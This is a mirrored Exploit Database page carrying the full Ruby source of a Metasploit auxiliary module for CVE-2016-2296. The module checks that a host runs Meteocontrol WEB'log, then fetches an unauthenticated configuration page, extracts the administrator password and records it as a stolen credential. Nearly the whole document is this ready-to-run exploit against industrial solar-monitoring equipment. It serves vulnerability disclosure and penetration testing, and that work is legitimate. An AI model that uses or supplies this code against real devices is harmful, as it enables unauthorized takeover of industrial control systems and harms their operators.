Meteocontrol WEB’log – Admin Password Disclosure (Metasploit)

• Exploit Database
• 125 阅读

• 作者： Karn Ganeshen
  日期： 2016-05-17
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/39822/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142

  # Exploit Title: [Meteocontrol WEB&apos;log - Extract Admin password] # Discovered by: Karn Ganeshen # Vendor Homepage: [http://www.meteocontrol.com/en/] # Versions Reported: [All Meteocontrol WEB&apos;log versions] # CVE-ID: [CVE-2016-2296]   # Meteocontrol WEB&apos;log - Metasploit Auxiliary Module [modules/auxiliary/admin/scada/meteocontrol_weblog_login.rb]     ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require &apos;msf/core&apos;   class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner   def initialize(info={}) super(update_info(info, &apos;Name&apos;=> &apos;Meteocontrol WEBLog Password Extractor&apos;, &apos;Description&apos; => %{ This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal.   }, &apos;References&apos;=> [ [ &apos;URL&apos;, &apos;http://ipositivesecurity.blogspot.in/2016/05/ics-meteocontrol-weblog-security.html&apos; ], [ &apos;URL&apos;, &apos;https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01&apos; ] ], &apos;Author&apos; => [ &apos;Karn Ganeshen <KarnGaneshen[at]gmail.com>&apos;, ], &apos;License&apos;=> MSF_LICENSE ))   register_options( [ Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly. ], self.class) end   def run_host(ip) unless is_app_metweblog? return end   do_extract end   # # Check if App is Meteocontrol WEBlog #   def is_app_metweblog? begin res = send_request_cgi( { &apos;uri&apos; => &apos;/html/en/index.html&apos;, &apos;method&apos;=> &apos;GET&apos; }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError print_error("#{rhost}:#{rport} - HTTP Connection Failed...") return false end   if (res and res.code == 200 and (res.headers[&apos;Server&apos;].include?("IS2 Web Server") or res.body.include?("WEB&apos;log"))) print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...") return true else print_error("#{rhost}:#{rport} - Application does not appear to be Meteocontrol WEBlog. Module will not continue.") return false end end   # # Extract Administrator Password #   def do_extract() print_status("#{rhost}:#{rport} - Attempting to extract Administrator password") begin res = send_request_cgi( { &apos;uri&apos; => &apos;/html/en/confAccessProt.html&apos;, &apos;method&apos;=> &apos;GET&apos; })   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE print_error("#{rhost}:#{rport} - HTTP Connection Failed...") return :abort end   if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/) get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/) admin_password = get_admin_password[1] print_good("#{rhost}:#{rport} - Password is #{admin_password}") report_cred( ip: rhost, port: rport, service_name: &apos;Meteocontrol WEBlog Management Portal&apos;, password: admin_password, proof: res.body ) else # In some models, &apos;Website password&apos; page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases. print_error("Password not found. Check login manually.") end end   def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: &apos;tcp&apos;, workspace_id: myworkspace_id }   credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data)   login_data = { last_attempted_at: Time.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data)   create_credential_login(login_data) end end